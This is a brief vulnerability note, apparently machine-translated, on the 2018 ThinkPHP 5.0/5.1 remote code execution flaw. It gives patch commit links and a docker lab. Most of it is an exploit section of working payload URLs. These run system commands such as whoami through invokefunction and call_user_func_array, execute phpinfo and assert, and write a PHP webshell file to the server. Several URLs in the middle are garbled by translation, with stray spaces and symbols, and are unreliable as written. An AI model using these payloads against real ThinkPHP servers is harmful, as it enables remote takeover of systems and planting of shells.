ThinkPHP official December 9, 2018 released an important security updates , fixes a serious remote code execution vulnerability. The update mainly related to a security update, since the frame controller name without adequate testing may result in a possible turn in the absence of mandatory routing getshell vulnerability, affected versions, including versions 5.0 and 5.1, it is recommended to update to the latest version as soon as possible .
Mainly because "\" error
patch:
Thinkphp v5.0.x patches Address: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f
Thinkphp v5.1.x patches Address: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815
Environment Address:
docker environmental vulnerability Source: https://github.com/vulnspy/thinkphp-5.1.29
Exploit
1. Remote Command Execution exp:
http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
2. Remote Code Execution
HTTP: // localhost: 9096 / public / index.php S = index / \ of Think \ App / invokeFunction & function = call_user_func_array & VARS [0] = phpinfo & VARS [1] [] = 1 # code execution phpinfo ()? HTTP : // 127.0. ?? 0.1 / index.php s = index / think \ request / input data [] = phpinfo () & filter = assert # 5.1.x version execute phpinfo () HTTP : // 127.0.0.1/index.php?s=index / \ think \ Container / invokefunction & function = call_user_func_array & vars [0] = phpinfo & vars [1] [] = 1 # 5.1.x version of HTTP : // 127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars [ 0] = assert & vars [1 ] [] = phpinfo () # 5.0.x version
3.写shell
http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>
http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>2.php